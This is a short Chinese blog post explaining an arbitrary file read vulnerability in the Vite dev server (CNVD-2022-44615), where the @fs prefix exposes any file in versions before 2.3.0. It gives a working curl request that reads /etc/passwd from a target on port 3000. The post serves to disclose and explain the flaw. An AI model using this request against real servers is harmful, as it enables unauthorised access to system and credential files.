Vite @fs任意文件读取漏洞(CNVD-2022-44615)全解析

由 晨星运营组 发布

Vite @fs任意文件读取(CNVD-2022-44615)

漏洞说明

Vite 是一个现代前端构建工具,为 Web 项目提供更快、更精简的开发体验

它主要由两部分组成:具有热模块替换(HMR)功能的开发服务器,以及使用 Rollup 打包代码的构建命令

在 Vite 2.3.0 版本之前,可以通过 @fs 前缀读取文件系统上的任意文件

使用标准的 @fs 前缀访问/etc/passwd,可以获取文件内容

curl "http://your-ip:3000/@fs/etc/passwd"

-END-


0条评论

发表评论